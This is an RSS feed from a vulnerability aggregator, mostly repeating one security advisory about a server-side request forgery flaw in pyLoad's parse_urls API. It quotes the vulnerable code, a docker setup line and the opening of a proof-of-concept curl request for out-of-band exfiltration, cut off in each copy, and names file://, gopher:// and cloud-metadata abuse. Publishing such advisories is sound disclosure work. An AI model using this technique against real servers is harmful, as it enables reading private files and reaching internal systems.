<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sun, 04 Oct 2026 16:30:39 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-280684</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-280684</link>
      <description>EUVD-2026-280684</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-280684</guid>
    </item>
    <item>
      <title>fkie_cve-2026-35187</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-35187</link>
      <description>&lt;p&gt;pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the parse_urls API function in src/pyload/core/api/__init__.py fetches arbitrary URLs server-side via get_url(url) (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints, read local files via file:// protocol (pycurl reads the file server-side), interact with internal services via gopher:// and dict:// protocols, and enumerate file existence via error-based oracle (error 37 vs empty response).&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the parse_urls API function in src/pyload/core/api/__init__.py fetches arbitrary URLs server-side via get_url(url) (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints, read local files via file:// protocol (pycurl reads the file server-side), interact with internal services via gopher:// and dict:// protocols, and enumerate file existence via error-based oracle (error 37 vs empty response).&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-35187</guid>
    </item>
    <item>
      <title>GHSA-2wvg-62qm-gj33 — pyLoad: SSRF in parse_urls API endpoint via unvalidated URL parameter</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-2wvg-62qm-gj33</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: pyload-ng&lt;/p&gt;
&lt;p&gt;## Vulnerability Details&lt;/p&gt;
&lt;p&gt;**CWE-918**: Server-Side Request Forgery (SSRF)&lt;/p&gt;
&lt;p&gt;The `parse_urls` API function in `src/pyload/core/api/__init__.py` (line 556) fetches arbitrary URLs server-side via `get_url(url)` (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can:&lt;/p&gt;
&lt;p&gt;- Make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints
- **Read local files** via `file://` protocol (pycurl reads the file server-side)
- **Interact with internal services** via `gopher://` and `dict://` protocols
- **Enumerate file existence** via error-based oracle (error 37 vs empty response)&lt;/p&gt;
&lt;p&gt;### Vulnerable Code&lt;/p&gt;
&lt;p&gt;**`src/pyload/core/api/__init__.py` (line 556)**:&lt;/p&gt;
&lt;p&gt;```python
def parse_urls(self, html=None, url=None):
    if url:
        page = get_url(url)  # NO protocol restriction, NO URL validation, NO IP blacklist
        urls.update(RE_URLMATCH.findall(page))
```&lt;/p&gt;
&lt;p&gt;No validation is applied to the `url` parameter. The underlying pycurl supports `file://`, `gopher://`, `dict://`, and other dangerous protocols by default.&lt;/p&gt;
&lt;p&gt;## Steps to Reproduce&lt;/p&gt;
&lt;p&gt;### Setup&lt;/p&gt;
&lt;p&gt;```bash
docker run -d --name pyload -p 8084:8000 linuxserver/pyload-ng:latest
```&lt;/p&gt;
&lt;p&gt;Log in as any user with ADD permission and extract the CSRF token:&lt;/p&gt;
&lt;p&gt;```bash
CSRF=
```&lt;/p&gt;
&lt;p&gt;### PoC 1: Out-of-Band SSRF (HTTP/DNS exfiltration)&lt;/p&gt;
&lt;p&gt;```bash
curl -s -b &amp;#34;pyload_session_8000=&amp;lt;SESSION&amp;gt;&amp;#34;   -H &amp;#34;X-CSRFToken: &amp;#34;   -H &amp;#34;Content-Type: application/x-www-form-urlencoded&amp;#34;   -d &amp;#34;url=http:/…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: pyload-ng&lt;/p&gt;
&lt;p&gt;## Vulnerability Details&lt;/p&gt;
&lt;p&gt;**CWE-918**: Server-Side Request Forgery (SSRF)&lt;/p&gt;
&lt;p&gt;The `parse_urls` API function in `src/pyload/core/api/__init__.py` (line 556) fetches arbitrary URLs server-side via `get_url(url)` (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can:&lt;/p&gt;
&lt;p&gt;- Make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints
- **Read local files** via `file://` protocol (pycurl reads the file server-side)
- **Interact with internal services** via `gopher://` and `dict://` protocols
- **Enumerate file existence** via error-based oracle (error 37 vs empty response)&lt;/p&gt;
&lt;p&gt;### Vulnerable Code&lt;/p&gt;
&lt;p&gt;**`src/pyload/core/api/__init__.py` (line 556)**:&lt;/p&gt;
&lt;p&gt;```python
def parse_urls(self, html=None, url=None):
    if url:
        page = get_url(url)  # NO protocol restriction, NO URL validation, NO IP blacklist
        urls.update(RE_URLMATCH.findall(page))
```&lt;/p&gt;
&lt;p&gt;No validation is applied to the `url` parameter. The underlying pycurl supports `file://`, `gopher://`, `dict://`, and other dangerous protocols by default.&lt;/p&gt;
&lt;p&gt;## Steps to Reproduce&lt;/p&gt;
&lt;p&gt;### Setup&lt;/p&gt;
&lt;p&gt;```bash
docker run -d --name pyload -p 8084:8000 linuxserver/pyload-ng:latest
```&lt;/p&gt;
&lt;p&gt;Log in as any user with ADD permission and extract the CSRF token:&lt;/p&gt;
&lt;p&gt;```bash
CSRF=
```&lt;/p&gt;
&lt;p&gt;### PoC 1: Out-of-Band SSRF (HTTP/DNS exfiltration)&lt;/p&gt;
&lt;p&gt;```bash
curl -s -b &amp;#34;pyload_session_8000=&amp;lt;SESSION&amp;gt;&amp;#34;   -H &amp;#34;X-CSRFToken: &amp;#34;   -H &amp;#34;Content-Type: application/x-www-form-urlencoded&amp;#34;   -d &amp;#34;url=http:/…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-2wvg-62qm-gj33</guid>
    </item>
    <item>
      <title>PYSEC-2026-2988 — pyLoad: SSRF in parse_urls API endpoint via unvalidated URL parameter</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2026-2988</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: pyload-ng&lt;/p&gt;
&lt;p&gt;## Vulnerability Details&lt;/p&gt;
&lt;p&gt;**CWE-918**: Server-Side Request Forgery (SSRF)&lt;/p&gt;
&lt;p&gt;The `parse_urls` API function in `src/pyload/core/api/__init__.py` (line 556) fetches arbitrary URLs server-side via `get_url(url)` (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can:&lt;/p&gt;
&lt;p&gt;- Make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints
- **Read local files** via `file://` protocol (pycurl reads the file server-side)
- **Interact with internal services** via `gopher://` and `dict://` protocols
- **Enumerate file existence** via error-based oracle (error 37 vs empty response)&lt;/p&gt;
&lt;p&gt;### Vulnerable Code&lt;/p&gt;
&lt;p&gt;**`src/pyload/core/api/__init__.py` (line 556)**:&lt;/p&gt;
&lt;p&gt;```python
def parse_urls(self, html=None, url=None):
    if url:
        page = get_url(url)  # NO protocol restriction, NO URL validation, NO IP blacklist
        urls.update(RE_URLMATCH.findall(page))
```&lt;/p&gt;
&lt;p&gt;No validation is applied to the `url` parameter. The underlying pycurl supports `file://`, `gopher://`, `dict://`, and other dangerous protocols by default.&lt;/p&gt;
&lt;p&gt;## Steps to Reproduce&lt;/p&gt;
&lt;p&gt;### Setup&lt;/p&gt;
&lt;p&gt;```bash
docker run -d --name pyload -p 8084:8000 linuxserver/pyload-ng:latest
```&lt;/p&gt;
&lt;p&gt;Log in as any user with ADD permission and extract the CSRF token:&lt;/p&gt;
&lt;p&gt;```bash
CSRF=
```&lt;/p&gt;
&lt;p&gt;### PoC 1: Out-of-Band SSRF (HTTP/DNS exfiltration)&lt;/p&gt;
&lt;p&gt;```bash
curl -s -b &amp;#34;pyload_session_8000=&amp;lt;SESSION&amp;gt;&amp;#34;   -H &amp;#34;X-CSRFToken: &amp;#34;   -H &amp;#34;Content-Type: application/x-www-form-urlencoded&amp;#34;   -d &amp;#34;url=http:/…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: pyload-ng&lt;/p&gt;
&lt;p&gt;## Vulnerability Details&lt;/p&gt;
&lt;p&gt;**CWE-918**: Server-Side Request Forgery (SSRF)&lt;/p&gt;
&lt;p&gt;The `parse_urls` API function in `src/pyload/core/api/__init__.py` (line 556) fetches arbitrary URLs server-side via `get_url(url)` (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can:&lt;/p&gt;
&lt;p&gt;- Make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints
- **Read local files** via `file://` protocol (pycurl reads the file server-side)
- **Interact with internal services** via `gopher://` and `dict://` protocols
- **Enumerate file existence** via error-based oracle (error 37 vs empty response)&lt;/p&gt;
&lt;p&gt;### Vulnerable Code&lt;/p&gt;
&lt;p&gt;**`src/pyload/core/api/__init__.py` (line 556)**:&lt;/p&gt;
&lt;p&gt;```python
def parse_urls(self, html=None, url=None):
    if url:
        page = get_url(url)  # NO protocol restriction, NO URL validation, NO IP blacklist
        urls.update(RE_URLMATCH.findall(page))
```&lt;/p&gt;
&lt;p&gt;No validation is applied to the `url` parameter. The underlying pycurl supports `file://`, `gopher://`, `dict://`, and other dangerous protocols by default.&lt;/p&gt;
&lt;p&gt;## Steps to Reproduce&lt;/p&gt;
&lt;p&gt;### Setup&lt;/p&gt;
&lt;p&gt;```bash
docker run -d --name pyload -p 8084:8000 linuxserver/pyload-ng:latest
```&lt;/p&gt;
&lt;p&gt;Log in as any user with ADD permission and extract the CSRF token:&lt;/p&gt;
&lt;p&gt;```bash
CSRF=
```&lt;/p&gt;
&lt;p&gt;### PoC 1: Out-of-Band SSRF (HTTP/DNS exfiltration)&lt;/p&gt;
&lt;p&gt;```bash
curl -s -b &amp;#34;pyload_session_8000=&amp;lt;SESSION&amp;gt;&amp;#34;   -H &amp;#34;X-CSRFToken: &amp;#34;   -H &amp;#34;Content-Type: application/x-www-form-urlencoded&amp;#34;   -d &amp;#34;url=http:/…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2026-2988</guid>
    </item>
  </channel>
</rss>
